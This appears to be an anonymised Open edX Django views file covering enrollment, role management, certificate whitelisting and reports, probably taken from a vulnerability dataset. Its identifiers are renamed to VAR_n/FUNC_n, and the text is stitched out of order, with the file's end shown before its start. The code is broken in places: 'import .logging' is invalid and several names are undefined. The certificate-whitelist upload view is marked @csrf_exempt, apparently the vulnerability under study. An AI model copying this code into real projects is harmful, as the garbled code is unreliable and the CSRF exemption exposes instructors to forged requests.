u'Certificate invalidated for %s in VAR_65 %s when removed from VAR_163 VAR_154 list',
VAR_40.username,
VAR_38
)
except ObjectDoesNotExist:
pass
VAR_41.delete()
def FUNC_74(VAR_9, VAR_38):
VAR_41 = FUNC_75(VAR_9)
VAR_19 = VAR_41.get('user_name', '') or VAR_41.get('user_email', '')
if not VAR_19:
raise ValueError(_('Student VAR_15/VAR_14 field is required and can not be empty. '
'Kindly fill in VAR_15/VAR_14 and then press "Add to Exception List" button.'))
VAR_155 = FUNC_76(VAR_19, VAR_38)
return VAR_41, VAR_155
def FUNC_75(VAR_9):
try:
VAR_192 = json.loads(VAR_9.body or '{}')
except ValueError:
raise ValueError(_('The record is not in the correct format. Please add a valid VAR_15 or VAR_14 address.'))
return VAR_192
def FUNC_76(VAR_42, VAR_38):
try:
VAR_40 = get_user_by_username_or_email(VAR_42)
except ObjectDoesNotExist:
raise ValueError(_("{VAR_19} does not exist in the LMS. Please check your spelling and retry.").format(
VAR_19=VAR_42
))
if not CourseEnrollment.is_enrolled(VAR_40, VAR_38):
raise ValueError(_("{VAR_19} is not enrolled in this VAR_65. Please check your spelling and retry.")
.format(VAR_19=VAR_42))
return VAR_40
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_77(VAR_9, VAR_10, VAR_43=None):
VAR_38 = CourseKey.from_string(VAR_10)
if VAR_43 == 'all':
VAR_125 = 'all_whitelisted'
elif VAR_43 == 'new':
VAR_125 = 'whitelisted_not_generated'
else:
return JsonResponse(
{
'success': False,
'message': _('Invalid VAR_192, VAR_43 must be "new" or "all".'),
},
status=400
)
instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38, student_set=VAR_125)
VAR_63 = {
'success': True,
'message': _('Certificate generation started for white listed VAR_125.'),
}
return JsonResponse(VAR_63)
@csrf_exempt
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_78(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_156 = 0
VAR_157 = 1
VAR_158 = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
VAR_38 = CourseKey.from_string(VAR_10)
VAR_125, VAR_50, VAR_159 = [], [], []
VAR_49 = {VAR_160: [] for VAR_160 in VAR_158}
def FUNC_87(VAR_160, VAR_161, VAR_162):
VAR_49[VAR_160].append(_('user "{VAR_19}" in row# {row}').format(VAR_19=VAR_161, row=VAR_162))
if 'students_list' in VAR_9.FILES:
try:
VAR_194 = VAR_9.FILES.get('students_list')
if VAR_194.name.endswith('.csv'):
VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
else:
VAR_50.append(_('Make sure that the file you upload is in CSV format with no '
'extraneous characters or VAR_124.'))
except Exception: # pylint: disable=broad-except
VAR_50.append(_('Could not read uploaded file.'))
finally:
VAR_194.close()
VAR_166 = 0
for VAR_40 in VAR_125:
VAR_166 += 1
if len(VAR_40) != 2:
if len(VAR_40) > 0:
FUNC_87('data_format_error', VAR_40[VAR_156], VAR_166)
VAR_0.info(u'invalid VAR_192/format in VAR_26 row# %s', VAR_166)
continue
VAR_19 = VAR_40[VAR_156]
try:
VAR_19 = get_user_by_username_or_email(VAR_19)
except ObjectDoesNotExist:
FUNC_87('user_not_exist', VAR_19, VAR_166)
VAR_0.info(u'student %s does not exist', VAR_19)
else:
if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_19)) > 0:
FUNC_87('user_already_white_listed', VAR_19, VAR_166)
VAR_0.warning(u'student %s already exist.', VAR_19.username)
elif not CourseEnrollment.is_enrolled(VAR_19, VAR_38):
FUNC_87('user_not_enrolled', VAR_19, VAR_166)
VAR_0.warning(u'student %s is not enrolled in VAR_65.', VAR_19.username)
else:
CertificateWhitelist.objects.create(
VAR_19=VAR_19,
VAR_10=VAR_38,
whitelist=True,
notes=VAR_40[VAR_157]
)
VAR_159.append(_('user "{VAR_15}" in row# {row}').format(VAR_15=VAR_19.username, row=VAR_166))
else:
VAR_50.append(_('File is not attached.'))
VAR_51 = {
'general_errors': VAR_50,
'row_errors': VAR_49,
'success': VAR_159
}
return JsonResponse(VAR_51)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_http_methods(['POST', 'DELETE'])
def FUNC_79(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
try:
VAR_45 = FUNC_75(VAR_9)
VAR_163 = FUNC_82(VAR_45, VAR_38)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
if VAR_9.method == 'POST':
try:
VAR_46 = FUNC_80(VAR_9, VAR_163, VAR_45)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
return JsonResponse(VAR_46)
elif VAR_9.method == 'DELETE':
try:
FUNC_81(VAR_9, VAR_38, VAR_163)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
return JsonResponse({}, status=204)
def FUNC_80(VAR_9, VAR_44, VAR_45):
if len(CertificateInvalidation.get_certificate_invalidations(
VAR_44.course_id,
VAR_44.user,
)) > 0:
raise ValueError(
_("Certificate of {VAR_19} has already been invalidated. Please check your spelling and retry.").format(
VAR_19=VAR_44.user.username,
)
)
if not VAR_44.is_valid():
raise ValueError(
_("Certificate for VAR_40 {VAR_19} is already invalid, kindly verify that VAR_163 was generated "
"for this VAR_40 and then proceed.").format(VAR_19=VAR_44.user.username)
)
VAR_46, VAR_72 = CertificateInvalidation.objects.update_or_create(
VAR_44=generated_certificate,
defaults={
'invalidated_by': VAR_9.user,
'notes': VAR_45.get("notes", ""),
'active': True,
}
)
VAR_44.invalidate()
return {
'id': VAR_46.id,
'user': VAR_46.generated_certificate.user.username,
'invalidated_by': VAR_46.invalidated_by.username,
'created': VAR_46.created.strftime("%B %d, %Y"),
'notes': VAR_46.notes,
}
def FUNC_81(VAR_9, VAR_38, VAR_44):
try:
VAR_46 = CertificateInvalidation.objects.get(VAR_44=generated_certificate)
except ObjectDoesNotExist:
raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
else:
VAR_46.deactivate()
VAR_40 = VAR_46.generated_certificate.user
instructor_task.api.generate_certificates_for_students(
VAR_9, VAR_38, student_set="specific_student", specific_student_id=VAR_40.id
)
def FUNC_82(VAR_46, VAR_38):
VAR_19 = VAR_46.get("user")
if not VAR_19:
raise ValueError(
_('Student VAR_15/VAR_14 field is required and can not be empty. '
'Kindly fill in VAR_15/VAR_14 and then press "Invalidate Certificate" button.')
)
VAR_40 = FUNC_76(VAR_19, VAR_38)
VAR_163 = GeneratedCertificate.certificate_for_student(VAR_40, VAR_38)
if not VAR_163:
raise ValueError(_(
"The VAR_40 {student} does not have VAR_163 for the VAR_65 {course}. Kindly verify VAR_40 "
"username/VAR_14 and the selected VAR_65 are correct and try again."
).format(VAR_40=VAR_40.username, VAR_65=VAR_38.course))
return VAR_163
|
import StringIO
import json
import .logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from VAR_40 import auth
from VAR_40.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from VAR_40.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import .csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from VAR_40.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1):
def FUNC_82(VAR_9, *VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_164 = (VAR_9.is_ajax() or
VAR_9.META.get("HTTP_ACCEPT", "").startswith("application/json"))
try:
return VAR_1(VAR_9, *VAR_2, **VAR_3)
except User.DoesNotExist:
VAR_74 = _("User does not exist.")
if VAR_164:
return JsonResponse({"error": VAR_74}, 400)
else:
return HttpResponseBadRequest(VAR_74)
except AlreadyRunningError:
VAR_74 = _("Task is already running.")
if VAR_164:
return JsonResponse({"error": VAR_74}, 400)
else:
return HttpResponseBadRequest(VAR_74)
return FUNC_82
def FUNC_1(*VAR_2, **VAR_3):
VAR_47 = []
VAR_47 += [(arg, None) for arg in VAR_2]
VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]
def FUNC_83(VAR_1): # pylint: disable=missing-docstring
def FUNC_82(*VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_9 = VAR_2[0]
VAR_193 = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (VAR_209, extra) in VAR_47:
VAR_199 = object()
if VAR_9.POST.get(VAR_209, VAR_199) == default:
VAR_193['parameters'].append(VAR_209)
VAR_193['info'][VAR_209] = extra
if len(VAR_193['parameters']) > 0:
return JsonResponse(VAR_193, status=400)
else:
return VAR_1(*VAR_2, **VAR_3)
return FUNC_82
return FUNC_83
def FUNC_2(VAR_4):
if VAR_4 not in ['instructor', 'staff']:
raise ValueError("unrecognized VAR_4 '{}'".format(VAR_4))
def FUNC_83(VAR_1): # pylint: disable=missing-docstring
def FUNC_82(*VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_9 = VAR_2[0]
VAR_65 = get_course_by_id(CourseKey.from_string(VAR_3['course_id']))
if has_access(VAR_9.user, VAR_4, VAR_65):
return VAR_1(*VAR_2, **VAR_3)
else:
return HttpResponseForbidden()
return FUNC_82
return FUNC_83
def FUNC_3(VAR_1):
def FUNC_82(VAR_9, *VAR_2, **VAR_3): # pylint: disable=missing-docstring
if GlobalStaff().has_user(VAR_9.user):
return VAR_1(VAR_9, *VAR_2, **VAR_3)
else:
return HttpResponseForbidden(
u"Must be {platform_name} staff to perform this VAR_57.".format(
platform_name=settings.PLATFORM_NAME
)
)
return FUNC_82
def FUNC_4(VAR_1):
def FUNC_82(VAR_9, VAR_10): # pylint: disable=missing-docstring
try:
VAR_38 = CourseKey.from_string(VAR_10)
except InvalidKeyError:
VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
return HttpResponseNotFound()
VAR_165 = auth.user_has_role(VAR_9.user, CourseSalesAdminRole(VAR_38))
if VAR_165:
return VAR_1(VAR_9, VAR_10)
else:
return HttpResponseForbidden()
return FUNC_82
def FUNC_5(VAR_1):
def FUNC_82(VAR_9, VAR_10): # pylint: disable=missing-docstring
try:
VAR_38 = CourseKey.from_string(VAR_10)
except InvalidKeyError:
VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
return HttpResponseNotFound()
VAR_165 = auth.user_has_role(VAR_9.user, CourseFinanceAdminRole(VAR_38))
if VAR_165:
return VAR_1(VAR_9, VAR_10)
else:
return HttpResponseForbidden()
return FUNC_82
VAR_5 = 0
VAR_6 = 1
VAR_7 = 2
VAR_8 = 3
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_6(VAR_9, VAR_10): # pylint: disable=too-many-statements
if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
return HttpResponseForbidden()
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_48 = []
VAR_49 = []
VAR_50 = []
if CourseMode.is_white_label(VAR_10):
VAR_24 = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
else:
VAR_24 = None
if 'students_list' in VAR_9.FILES:
VAR_125 = []
try:
VAR_194 = VAR_9.FILES.get('students_list')
if VAR_194.name.endswith('.csv'):
VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
VAR_65 = get_course_by_id(VAR_10)
else:
VAR_50.append({
'username': '', 'email': '',
'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or VAR_124.')
})
except Exception: # pylint: disable=broad-except
VAR_50.append({
'username': '', 'email': '', 'response': _('Could not read uploaded file.')
})
finally:
VAR_194.close()
VAR_12 = []
VAR_166 = 0
for VAR_40 in VAR_125:
VAR_166 = row_num + 1
if len(VAR_40) != 4:
if len(VAR_40) > 0:
VAR_50.append({
'username': '',
'email': '',
'response': _('Data in row #{VAR_166} must have exactly four columns: VAR_14, VAR_15, full VAR_16, and country').format(VAR_166=row_num)
})
continue
VAR_14 = VAR_40[VAR_5]
VAR_15 = VAR_40[VAR_6]
VAR_16 = VAR_40[VAR_7]
VAR_17 = VAR_40[VAR_8][:2]
VAR_25 = get_email_params(VAR_65, True, VAR_168=VAR_9.is_secure())
try:
validate_email(VAR_14) # Raises ValidationError if invalid
except ValidationError:
VAR_49.append({
'username': VAR_15, 'email': VAR_14, 'response': _('Invalid VAR_14 {email_address}.').format(email_address=VAR_14)})
else:
if User.objects.filter(VAR_14=email).exists():
VAR_19 = User.objects.get(VAR_14=email)
if not User.objects.filter(VAR_14=VAR_14, VAR_15=username).exists():
VAR_211 = _(
'An account with VAR_14 {email} exists but the provided VAR_15 {VAR_15} '
'is different. Enrolling anyway with {VAR_14}.'
).format(VAR_14=VAR_14, VAR_15=username)
VAR_48.append({
'username': VAR_15, 'email': VAR_14, 'response': VAR_211
})
VAR_0.warning(u'email %s already exist', VAR_14)
else:
VAR_0.info(
u"user already exists with VAR_15 '%s' and VAR_14 '%s'",
VAR_15,
VAR_14
)
if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
FUNC_10(
VAR_19=VAR_19,
VAR_10=course_id,
VAR_20=VAR_24,
VAR_21=VAR_9.user,
VAR_22='Enrolling via VAR_26 upload',
VAR_23=UNENROLLED_TO_ENROLLED,
)
enroll_email(VAR_10=course_id, student_email=VAR_14, VAR_60=True, VAR_61=True, VAR_25=email_params)
else:
VAR_18 = FUNC_8(VAR_12)
VAR_56 = FUNC_11(
VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_9.user, VAR_25
)
VAR_49.extend(VAR_56)
else:
VAR_50.append({
'username': '', 'email': '', 'response': _('File is not attached.')
})
VAR_51 = {
'row_errors': VAR_49,
'general_errors': VAR_50,
'warnings': VAR_48
}
return JsonResponse(VAR_51)
def FUNC_7(VAR_11):
VAR_52 = [
char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
if char not in 'aAeEiIoOuU1l'
]
return string.join((random.choice(VAR_52) for VAR_72 in range(VAR_11)), '')
def FUNC_8(VAR_12, VAR_13=12):
VAR_18 = FUNC_7(VAR_13)
while VAR_18 in VAR_12:
VAR_18 = FUNC_7(VAR_13)
VAR_12.append(VAR_18)
return VAR_18
def FUNC_9(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18):
VAR_19 = User.objects.create_user(VAR_15, VAR_14, VAR_18)
VAR_53 = Registration()
VAR_53.register(VAR_19)
VAR_54 = UserProfile(VAR_19=user)
VAR_54.name = VAR_16
VAR_54.country = VAR_17
VAR_54.save()
return VAR_19
def FUNC_10(VAR_19, VAR_10, VAR_20, VAR_21, VAR_22, VAR_23):
VAR_55 = CourseEnrollment.enroll(VAR_19, VAR_10, VAR_20=mode)
ManualEnrollmentAudit.create_manual_enrollment_audit(
VAR_21, VAR_19.email, VAR_23, VAR_22, VAR_55
)
VAR_0.info(u'user %s enrolled in the VAR_65 %s', VAR_19.username, VAR_10)
return VAR_55
def FUNC_11(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_21, VAR_25):
VAR_56 = list()
try:
with transaction.atomic():
VAR_19 = FUNC_9(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18)
FUNC_10(
VAR_19=VAR_19,
VAR_10=course_id,
VAR_20=VAR_24,
VAR_21=enrolled_by,
VAR_22='Enrolling via VAR_26 upload',
VAR_23=UNENROLLED_TO_ENROLLED,
)
except IntegrityError:
VAR_56.append({
'username': VAR_15, 'email': VAR_14, 'response': _('Username {VAR_19} already exists.').format(VAR_19=VAR_15)
})
except Exception as ex: # pylint: disable=broad-except
VAR_0.exception(type(ex).__name__)
VAR_56.append({
'username': VAR_15, 'email': VAR_14, 'response': type(ex).__name__,
})
else:
try:
VAR_25.update({
'message': 'account_creation_and_enrollment',
'email_address': VAR_14,
'password': VAR_18,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
})
send_mail_to_student(VAR_14, VAR_25)
except Exception as ex: # pylint: disable=broad-except
VAR_0.exception(
"Exception '{VAR_154}' raised while sending VAR_14 to new VAR_19.".format(VAR_154=type(ex).__name__)
)
VAR_56.append({
'username': VAR_15,
'email': VAR_14,
'response':
_("Error '{VAR_169}' while sending VAR_14 to new VAR_19 (user VAR_14={email}). "
"Without the VAR_14 VAR_40 would not be able to login. "
"Please contact support for further information.").format(VAR_169=type(ex).__name__, VAR_14=email),
})
else:
VAR_0.info(u'email sent to new VAR_149 VAR_19 at %s', VAR_14)
return VAR_56
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(VAR_57="enroll or unenroll", VAR_59="stringified list of VAR_133 and/or usernames")
def FUNC_12(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_57 = VAR_9.POST.get('action')
VAR_58 = VAR_9.POST.get('identifiers')
VAR_59 = FUNC_63(VAR_58)
VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
VAR_62 = CourseMode.is_white_label(VAR_10)
VAR_22 = VAR_9.POST.get('reason')
if VAR_62:
if not VAR_22:
return JsonResponse(
{
'action': VAR_57,
'results': [{'error': True}],
'auto_enroll': VAR_60,
}, status=400)
VAR_55 = None
VAR_23 = DEFAULT_TRANSITION_STATE
VAR_25 = {}
if VAR_61:
VAR_65 = get_course_by_id(VAR_10)
VAR_25 = get_email_params(VAR_65, VAR_60, VAR_168=VAR_9.is_secure())
VAR_51 = []
for identifier in VAR_59:
VAR_19 = None
VAR_14 = None
VAR_167 = None
try:
VAR_19 = get_student_from_identifier(identifier)
except User.DoesNotExist:
VAR_14 = identifier
else:
VAR_14 = VAR_19.email
VAR_167 = get_user_email_language(VAR_19)
try:
validate_email(VAR_14) # Raises ValidationError if invalid
if VAR_57 == 'enroll':
VAR_200, VAR_201, VAR_55 = enroll_email(
VAR_10, VAR_14, VAR_60, VAR_61, VAR_25, VAR_167=language
)
VAR_202 = VAR_200.to_dict()['enrollment']
VAR_203 = VAR_200.to_dict()['user']
VAR_204 = VAR_200.to_dict()['allowed']
VAR_205 = VAR_201.to_dict()['enrollment']
VAR_206 = VAR_201.to_dict()['allowed']
if VAR_203:
if VAR_205:
if VAR_202:
VAR_23 = ENROLLED_TO_ENROLLED
else:
if VAR_204:
VAR_23 = ALLOWEDTOENROLL_TO_ENROLLED
else:
VAR_23 = UNENROLLED_TO_ENROLLED
else:
if VAR_206:
VAR_23 = UNENROLLED_TO_ALLOWEDTOENROLL
elif VAR_57 == 'unenroll':
VAR_200, VAR_201 = unenroll_email(
VAR_10, VAR_14, VAR_61, VAR_25, VAR_167=language
)
VAR_202 = VAR_200.to_dict()['enrollment']
VAR_204 = VAR_200.to_dict()['allowed']
VAR_55 = CourseEnrollment.get_enrollment(VAR_19, VAR_10)
if VAR_202:
VAR_23 = ENROLLED_TO_UNENROLLED
else:
if VAR_204:
VAR_23 = ALLOWEDTOENROLL_TO_UNENROLLED
else:
VAR_23 = UNENROLLED_TO_UNENROLLED
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_57 '{}'".format(VAR_57)
))
except ValidationError:
VAR_51.append({
'identifier': identifier,
'invalidIdentifier': True,
})
except Exception as exc: # pylint: disable=broad-except
VAR_0.exception(u"Error while #{}ing student")
VAR_0.exception(exc)
VAR_51.append({
'identifier': identifier,
'error': True,
})
else:
ManualEnrollmentAudit.create_manual_enrollment_audit(
VAR_9.user, VAR_14, VAR_23, VAR_22, VAR_55
)
VAR_51.append({
'identifier': identifier,
'before': VAR_200.to_dict(),
'after': VAR_201.to_dict(),
})
VAR_63 = {
'action': VAR_57,
'results': VAR_51,
'auto_enroll': VAR_60,
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
@FUNC_1(
VAR_59="stringified list of VAR_133 and/or usernames",
VAR_57="add or remove",
)
def FUNC_13(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_57 = VAR_9.POST.get('action')
VAR_58 = VAR_9.POST.get('identifiers')
VAR_59 = FUNC_63(VAR_58)
VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
VAR_51 = []
VAR_64 = 'beta'
VAR_65 = get_course_by_id(VAR_10)
VAR_25 = {}
if VAR_61:
VAR_168 = VAR_9.is_secure()
VAR_25 = get_email_params(VAR_65, VAR_60=auto_enroll, VAR_168=secure)
for identifier in VAR_59:
try:
VAR_169 = False
VAR_195 = False
VAR_19 = get_student_from_identifier(identifier)
if VAR_57 == 'add':
allow_access(VAR_65, VAR_19, VAR_64)
elif VAR_57 == 'remove':
revoke_access(VAR_65, VAR_19, VAR_64)
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_57 '{}'".format(VAR_57)
))
except User.DoesNotExist:
VAR_169 = True
VAR_195 = True
except Exception as exc: # pylint: disable=broad-except
VAR_0.exception(u"Error while #{}ing student")
VAR_0.exception(exc)
VAR_169 = True
else:
if VAR_61:
send_beta_role_email(VAR_57, VAR_19, VAR_25)
if VAR_60:
if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
CourseEnrollment.enroll(VAR_19, VAR_10)
finally:
VAR_51.append({
'identifier': identifier,
'error': VAR_169,
'userDoesNotExist': VAR_195
})
VAR_63 = {
'action': VAR_57,
'results': VAR_51,
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
@FUNC_1(
VAR_141="email or VAR_15 of VAR_19 to change access",
VAR_64="'instructor', 'staff', 'beta', or 'ccx_coach'",
VAR_57="'allow' or 'revoke'"
)
def FUNC_14(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'instructor', VAR_10, depth=None
)
try:
VAR_19 = get_student_from_identifier(VAR_9.POST.get('unique_student_identifier'))
except User.DoesNotExist:
VAR_63 = {
'unique_student_identifier': VAR_9.POST.get('unique_student_identifier'),
'userDoesNotExist': True,
}
return JsonResponse(VAR_63)
if not VAR_19.is_active:
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'inactiveUser': True,
}
return JsonResponse(VAR_63)
VAR_64 = VAR_9.POST.get('rolename')
VAR_57 = VAR_9.POST.get('action')
if VAR_64 not in ROLES:
VAR_169 = strip_tags("unknown VAR_64 '{}'".format(VAR_64))
VAR_0.error(VAR_169)
return HttpResponseBadRequest(VAR_169)
if VAR_64 == 'instructor' and VAR_19 == VAR_9.user and VAR_57 != 'allow':
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'rolename': VAR_64,
'action': VAR_57,
'removingSelfAsInstructor': True,
}
return JsonResponse(VAR_63)
if VAR_57 == 'allow':
allow_access(VAR_65, VAR_19, VAR_64)
elif VAR_57 == 'revoke':
revoke_access(VAR_65, VAR_19, VAR_64)
else:
return HttpResponseBadRequest(strip_tags(
"unrecognized VAR_57 '{}'".format(VAR_57)
))
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'rolename': VAR_64,
'action': VAR_57,
'success': 'yes',
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_1(VAR_64="'instructor', 'staff', or 'beta'")
def FUNC_15(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'instructor', VAR_10, depth=None
)
VAR_64 = VAR_9.POST.get('rolename')
if VAR_64 not in ROLES:
return HttpResponseBadRequest()
def FUNC_84(VAR_19):
return {
'username': VAR_19.username,
'email': VAR_19.email,
'first_name': VAR_19.first_name,
'last_name': VAR_19.last_name,
}
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
VAR_64: map(FUNC_84, list_with_level(
VAR_65, VAR_64
)),
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_16(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_66 = VAR_9.POST.get('problem_location', '')
try:
VAR_170 = UsageKey.from_string(VAR_66)
VAR_171 = VAR_170.run
if not VAR_171:
VAR_170 = VAR_38.make_usage_key_from_deprecated_string(VAR_66)
if VAR_170.course_key != VAR_38:
raise InvalidKeyError(type(VAR_170), problem_key)
except InvalidKeyError:
return JsonResponseBadRequest(_("Could not find problem with this location."))
try:
instructor_task.api.submit_calculate_problem_responses_csv(VAR_9, VAR_38, VAR_66)
VAR_172 = _(
"The problem responses report is being VAR_149."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"A problem responses report generation VAR_150 is already in progress. "
"Check the 'Pending Tasks' table for the status of the VAR_150. "
"When completed, the report will be available for download in the table below."
)
return JsonResponse({"status": VAR_196})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_17(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_67 = instructor_analytics.basic.dump_grading_context(VAR_65)
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'grading_config_summary': VAR_67,
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_18(VAR_9, VAR_10, VAR_26=False): # pylint: disable=unused-argument, redefined-outer-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_68 = [
'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
'internal_reference', 'invoice_number', 'codes', 'course_id'
]
VAR_69 = instructor_analytics.basic.sale_record_features(VAR_10, VAR_68)
if not VAR_26:
for VAR_197 in VAR_69:
VAR_197['created_by'] = VAR_197['created_by'].username
VAR_63 = {
